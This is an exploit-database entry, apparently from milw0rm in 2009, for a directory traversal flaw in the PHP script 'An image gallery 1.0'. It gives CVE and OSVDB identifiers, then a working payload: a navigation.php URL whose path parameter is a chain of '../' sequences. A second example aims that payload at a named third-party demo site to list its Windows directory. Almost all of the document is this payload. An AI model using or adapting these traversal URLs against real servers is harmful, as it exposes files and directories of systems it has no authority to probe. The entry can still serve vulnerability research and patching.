An image Gallery 1.0 - 'navigation.php' Local Directory Traversal

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-09-09 
date_updated:  
verified: 1 
codes: OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943 
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------------------------------------------------------
An image gallery 1.0(navigation.php) Local Directory Traversal
-------------------------------------------------------------------------
# Author  : ThE g0bL!N
# Download  : http://www.plohni.com/wb/content/php/download/An_image_gallery_1-0.zip
# Note: Algerie 1 - 0 Zambie
============================================
# Exploit  :
-----------
 http://localhost/PATH/navigation.php?path=../../../../../../../
#ex   :
-------
http://www.plohni.com/wb/content/php/demos/An_image_gallery/navigation.php?path=../../../../../../../windows/
============================================
Greetz:His0k4 & All My Friends
-------------------------------------------------------------------------

# milw0rm.com [2009-09-10]